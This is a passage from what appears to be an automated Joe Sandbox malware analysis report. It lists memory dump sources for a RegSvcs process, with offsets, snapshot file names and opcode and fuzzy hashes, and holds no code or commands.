                                                        • Instruction Fuzzy Hash: 5AD0CA202091C0AFC3028B248860418BFB0DE8B20431C84CEE4C48B262CA22A84BD7A5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ecd70a24f295d9e24d738088158d3b6defca1b03d1541978e385c4f3ab06bbab
                                                        • Instruction ID: bba8c118dc2136027586413b5616b888e6c962c702a53fea6aaf9911156709b3
                                                        • Opcode Fuzzy Hash: ecd70a24f295d9e24d738088158d3b6defca1b03d1541978e385c4f3ab06bbab
                                                        • Instruction Fuzzy Hash: 55C0122000A396CBCB920F2898660C1BB30EE0621C31549E2D884C9042DA30086AA310
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cabbbf4af5c5caf3d1ba14a40c595ed82d1b0a05e6470a1c24b10c78bb6813f9
                                                        • Instruction ID: ee39b139b31d8ad7f6141dc942eb79d34bf69ee525f49cf7cf12ae6d9611e84c
                                                        • Opcode Fuzzy Hash: cabbbf4af5c5caf3d1ba14a40c595ed82d1b0a05e6470a1c24b10c78bb6813f9
                                                        • Instruction Fuzzy Hash: 68C04C3220550077D3449748D852754BBA1EF84358F28C1599419CB696DF2AD4138644
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9160e9d861a2f388516cb49dd325ed4e824b7d6f951e116d370d5afaac8b4c0e
                                                        • Instruction ID: 2e073cf11f59f8b20667a730008c3f621750c4faa63f92a71a91aa580edc65a7
                                                        • Opcode Fuzzy Hash: 9160e9d861a2f388516cb49dd325ed4e824b7d6f951e116d370d5afaac8b4c0e
                                                        • Instruction Fuzzy Hash: 5BC04C395000044BD320DA14C951B44BB60AB98615F1A8498D89487355CB22DC039680
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e32954bdd0dcaaee8534d58cb4e35afb96bd95d9199734d34099e7483a549242
                                                        • Instruction ID: 14cf0137a3c0383e136ca1106191c5fc1969ff3391637b5c5ce9f474c7b2938a
                                                        • Opcode Fuzzy Hash: e32954bdd0dcaaee8534d58cb4e35afb96bd95d9199734d34099e7483a549242
                                                        • Instruction Fuzzy Hash: 4BC0123A1444C097C307C750C651A14FF52EB89618F18C8A9E54A46A12CB379C03E700
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 467b69f63989ef13f77390f105ac918867b2b31520ea0c680a83f115ee3b6c8c
                                                        • Instruction ID: 2a0f72a72fe5fe30c248d8aa207009d25ccfba534fe09b31a3919e79ee3fea00
                                                        • Opcode Fuzzy Hash: 467b69f63989ef13f77390f105ac918867b2b31520ea0c680a83f115ee3b6c8c
                                                        • Instruction Fuzzy Hash: 21C08CB22040000AC749C244C400340AB42D7A020CF78C0A8D019C7245DB2394839240
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d8fcf87e5c380888105a209accf590a6d90124aa87eaa08efa02450b075d436
                                                        • Instruction ID: f9c3781bf339f1612a2fc635bd573ef35aff821daff00db00770a3f6304612cf
                                                        • Opcode Fuzzy Hash: 2d8fcf87e5c380888105a209accf590a6d90124aa87eaa08efa02450b075d436
                                                        • Instruction Fuzzy Hash: 71C02BB00E34014FC7028F74C821820BF20EF9A210B2588D6E490CB3A3CB26C88BC600
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3610d987b6e0047fd855fdd07001155ea5325086870bf9db7fa0d106c22ffb16
                                                        • Instruction ID: 4c7aa28275177e9060c98a27a4279c8f13d9650a92e42c9749b5bcc0d3d5168d
                                                        • Opcode Fuzzy Hash: 3610d987b6e0047fd855fdd07001155ea5325086870bf9db7fa0d106c22ffb16
                                                        • Instruction Fuzzy Hash: 68C04C356080A086C357E7ACE5516D47B52D78A199F18C099D54AA7516CB239503CB40
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4b00adb3e1edd7dbd95bf62155069ab60d8cc70f687da7eeedb521285c586730
                                                        • Instruction ID: 90c793af0ae83e3bcc840bc14cbc20ba38e7027c4c28415f38524dbe04149969
                                                        • Opcode Fuzzy Hash: 4b00adb3e1edd7dbd95bf62155069ab60d8cc70f687da7eeedb521285c586730
                                                        • Instruction Fuzzy Hash: 54C08C310026015BC302C740CC909007B249B86203718C1E5D044CB3A7C732D8038B90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d00b3b7c9eda0501d21cbf77b5790760f1a2fbed0edc5782f63ceb64815d5d3
                                                        • Instruction ID: 0826dc0b9472f50480c795f990a8982948cfd74584bc4230d148f9798d54816a
                                                        • Opcode Fuzzy Hash: 3d00b3b7c9eda0501d21cbf77b5790760f1a2fbed0edc5782f63ceb64815d5d3
                                                        • Instruction Fuzzy Hash: 7EC04C701084904AC346C7249642764BF52E7C612DF58D49895469B266CA2298538744
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10f4b44b3aad55409072a917f4fb838f0cca70d3fa815dcf660f36d5e734ed48
                                                        • Instruction ID: b3e0b5c49377af0a53434bc54025158641ea8155a020466226e06a8c51a70fe6
                                                        • Opcode Fuzzy Hash: 10f4b44b3aad55409072a917f4fb838f0cca70d3fa815dcf660f36d5e734ed48
                                                        • Instruction Fuzzy Hash: B4C09B7414508046C341C750DE567107F51D747119F1984C49D8B56377CF279807DB41
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a198921665edc1e5b53a62bbe7d866c039d6ebb254def5902c93739debebbb5
                                                        • Instruction ID: feb27d801af87c72280f407095c05483c5b9a15e38950954f72b1125b387a6cf
                                                        • Opcode Fuzzy Hash: 6a198921665edc1e5b53a62bbe7d866c039d6ebb254def5902c93739debebbb5
                                                        • Instruction Fuzzy Hash: E1C08CB150E3808FC30BC264CC606017B70AB86200B1A80CAD084CB2F3DF22C80B8741
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e29b18b16b9a31beb695fd0c294768380fcd10eba26f328976a7388973c0ce3
                                                        • Instruction ID: 5fd885f9bb8155b72fb0e6ae41fe74b512127545952a60826f851bbfd2fd2929
                                                        • Opcode Fuzzy Hash: 7e29b18b16b9a31beb695fd0c294768380fcd10eba26f328976a7388973c0ce3
                                                        • Instruction Fuzzy Hash: 9AC092266500008BC29086A4ED8F7E2B750DB84224F2CC0AA98048FB62DB27D8C79AC9
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ad939a836a9afc931964b85ea36997d4d5569110a156af3cc98f503bc4a5869
                                                        • Instruction ID: 4a529168093d1388819f04d98b9156b08bd575a55372db3657bd7c2a688bd1c4
                                                        • Opcode Fuzzy Hash: 1ad939a836a9afc931964b85ea36997d4d5569110a156af3cc98f503bc4a5869
                                                        • Instruction Fuzzy Hash: 13C08C3064D2C01FC342D3208C118107F72AF8320831880EFD589CF1ABCA228903C300
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab2f25ea5ba6f320b728295df4ee2b4e6c185f183f5da85e32276bab78bb9b55
                                                        • Instruction ID: 6a323bd436746ce72330dae3b6fb67b03243d05052a6bdd9b3767225bb2770e8
                                                        • Opcode Fuzzy Hash: ab2f25ea5ba6f320b728295df4ee2b4e6c185f183f5da85e32276bab78bb9b55
                                                        • Instruction Fuzzy Hash: D2C04C7010409446D745C72895417457B56F7A5618F38E898D56A97156CA2394038740
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9c883936172071a74c90ef0193a0f77c63348afa5d86eb7a266b34cd58f6a280
                                                        • Instruction ID: 2a1a629b8587bf6c4174c45b7c166068254ff3f098b717923e62d6e46f7659ae
                                                        • Opcode Fuzzy Hash: 9c883936172071a74c90ef0193a0f77c63348afa5d86eb7a266b34cd58f6a280
                                                        • Instruction Fuzzy Hash: CCC09B3510100057C110D518CCD1F55B3119B84559F288054A4455B353CB27E9074580
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 598e613984722c3ef6e99cd81f80f087d4ee174945abfe072dc6a3588a1de623
                                                        • Instruction ID: 273e0b0c020da95f9a4fd965be08fa89df021cef5f10251835737063aacb2749
                                                        • Opcode Fuzzy Hash: 598e613984722c3ef6e99cd81f80f087d4ee174945abfe072dc6a3588a1de623
                                                        • Instruction Fuzzy Hash: 83C08C301080800AC749C32895512857B42F79220CF38948CD00587246CA3698038300
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3fa6f5d57228273cdaad023dc3ad13b6e4288bce04a528792b991da060535f41
                                                        • Instruction ID: 22b62d6bd2778793d3c51afdb527227d58491a04d49d378a680e1eab5e9bb186
                                                        • Opcode Fuzzy Hash: 3fa6f5d57228273cdaad023dc3ad13b6e4288bce04a528792b991da060535f41
                                                        • Instruction Fuzzy Hash: AFC08C7010A08006C20AC310A6023007B12FB8A609F38C888D0058B20BCA3698038740
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70b620ab97c02f8aaced9a9913b48325919361c7afe2b24cfdb6d5f56b5b85f9
                                                        • Instruction ID: 9def5cb5b39aa52e4d8629a87ceb5289d7f87ccecc8a70177c38d738ddbb295a
                                                        • Opcode Fuzzy Hash: 70b620ab97c02f8aaced9a9913b48325919361c7afe2b24cfdb6d5f56b5b85f9
                                                        • Instruction Fuzzy Hash: 84C08C380010044BE2498A00C8827C4B321EF80721F2484698844823A0C723C8038A80
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22fced8631e5da77a0d0b8321db6a1731e086b16370c39963d73d56cf658d728
                                                        • Instruction ID: b6618b6f33e7fbfe6124c49c27da75148b1397e96583fe6d3470b96cc69a1acf
                                                        • Opcode Fuzzy Hash: 22fced8631e5da77a0d0b8321db6a1731e086b16370c39963d73d56cf658d728
                                                        • Instruction Fuzzy Hash: C9C02B3010608007C306C310F501340BF16F7C170CF38C8E8D005CB207CB229803C300
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec11a8a8da507919b53c199d0d8c12af21ea6604c98971fb0e98fd10a9839afc
                                                        • Instruction ID: e972e19034d33c26d4ea4ddf6865afbfde2c38b80f95fca56b95742de36e3ee3
                                                        • Opcode Fuzzy Hash: ec11a8a8da507919b53c199d0d8c12af21ea6604c98971fb0e98fd10a9839afc
                                                        • Instruction Fuzzy Hash: 45C092389150816BC202DB20EA81704BF93EB8A20DF2CD5D9D85A9A353CB2B9817DB80
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2da6e8b13f75c6eb028965ecef5f8909852ea33a52093ca36dc9b6f1aa4d0d4e
                                                        • Instruction ID: d811ddd82ddb38e07d36a437ec8cbaccc4bf9088d4a3210a98811db2173958e8
                                                        • Opcode Fuzzy Hash: 2da6e8b13f75c6eb028965ecef5f8909852ea33a52093ca36dc9b6f1aa4d0d4e
                                                        • Instruction Fuzzy Hash: 84C09B6511000097E554C504D8C77F6B755E780515F18C8DAD404CAF51DA12D903C6C6
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a95baae6920d6b8d3c930bb06ebd8f2d9dfd0eb98aae9aac90b9b53b9e01f1bd
                                                        • Instruction ID: 0f42bf0039284174099dab803ef7e388d14aa6f20f926dd63cc00ab0e7c57b71
                                                        • Opcode Fuzzy Hash: a95baae6920d6b8d3c930bb06ebd8f2d9dfd0eb98aae9aac90b9b53b9e01f1bd
                                                        • Instruction Fuzzy Hash: B9C09B3414608047C645D76CD6427507F53E746159F6894D8D9CAD7357CF239C03DB40
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f7c213d06af095df88b05c1c15a3f33864e634e25abd19b30dcf6c5230dcfca4
                                                        • Instruction ID: 4456db617ac32b9f7a949d1d9eb5dcb5a87ad7aa6e89c03513a4271f1760b4ce
                                                        • Opcode Fuzzy Hash: f7c213d06af095df88b05c1c15a3f33864e634e25abd19b30dcf6c5230dcfca4
                                                        • Instruction Fuzzy Hash: EBC012B250C39026C3059B24D88630CABA29F81300F2888AC9485CA3B2EE2786028A81
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd350c136bcb269e6cc303830cfc7f6dc235c512b53af2f9753606533c4c3ea3
                                                        • Instruction ID: c3af7ad483ecccd86e2f4de5b5abe0da576f0df407a334393e3033ae8c10b855
                                                        • Opcode Fuzzy Hash: fd350c136bcb269e6cc303830cfc7f6dc235c512b53af2f9753606533c4c3ea3
                                                        • Instruction Fuzzy Hash: 83C092726444514BC346CA54ED41B14BBD3EBC521EF6CC0A8A40ACB28ACB26D8038A88
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8712adfce06649b1fb694ac5d7d36e892962622f2f393eec33f8556493611e29
                                                        • Instruction ID: 554d8ef4e9f0de584f957400b4d72f5448f036f42b650c1e00e8ec6b1b59d920
                                                        • Opcode Fuzzy Hash: 8712adfce06649b1fb694ac5d7d36e892962622f2f393eec33f8556493611e29
                                                        • Instruction Fuzzy Hash: BFC04C655455904BC702C614DD917007B519F96119F2D84D99485C6386DA2298039641
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eff987592046ad707a0fd30c4fb9f499ccfe430a1e80dd6662580297d37a8d4f
                                                        • Instruction ID: d892818d3e9482992f768180bf5d2ab079ce614df952da4c23bc27ee6e3a91cc
                                                        • Opcode Fuzzy Hash: eff987592046ad707a0fd30c4fb9f499ccfe430a1e80dd6662580297d37a8d4f
                                                        • Instruction Fuzzy Hash: 65C0927410608167E642C728DAC1740BF22FBD620DF7DE4EAD98797313EA22E817E710
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c325a5060ba502b1d906e361a7545bb765c44e252bdc1abe026dd4308b2e7dcd
                                                        • Instruction ID: 26d3aec63e608c9bcf868b3bace82d43accea79abbb8cc686ec5cb39c3b0cbfe
                                                        • Opcode Fuzzy Hash: c325a5060ba502b1d906e361a7545bb765c44e252bdc1abe026dd4308b2e7dcd
                                                        • Instruction Fuzzy Hash: 24C08C6120A5814BD3018B20C851510BF20AB46204718C8D9D050CB2A2CA268946C600
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57d714149f342bb90b0c43b17dc4f68047cecf38b02ec7e149575a4d63507fd7
                                                        • Instruction ID: 170406625d524737ec41a2e362d5a8c62a0088899bd1f88b942279ca08e12b9c
                                                        • Opcode Fuzzy Hash: 57d714149f342bb90b0c43b17dc4f68047cecf38b02ec7e149575a4d63507fd7
                                                        • Instruction Fuzzy Hash: ABC08C641092858FCB028B20E82A414BF70AF86200719C0EECC908A26BEB2A881EC701
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                        • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                        • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a31775f65206feb8c7eb126f5f81f87195f797ea5acfb4b2c81d1cdaa9f7c8d9
                                                        • Instruction ID: 93682585f343b8049460c8519adff42b090425fb8bb9c01b1be4665adb348be8
                                                        • Opcode Fuzzy Hash: a31775f65206feb8c7eb126f5f81f87195f797ea5acfb4b2c81d1cdaa9f7c8d9
                                                        • Instruction Fuzzy Hash: 38C04C7011D2C49FC742DB78C9655507FB0DE5B10471984EED4C5CF2A3D6669C03D701
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 949129132643568c8b23163eeda0cd4eb113cdc8b3507f999c3352c67f9686f2
                                                        • Instruction ID: a76d3f32bd4be91f57014a5643f875f1a2c5ca329da10b2a7bbaa7b5c881962f
                                                        • Opcode Fuzzy Hash: 949129132643568c8b23163eeda0cd4eb113cdc8b3507f999c3352c67f9686f2
                                                        • Instruction Fuzzy Hash: 73B012702050004B8388EA08C451408B3629BC4314314C09C640CCB246CF33D8038D44
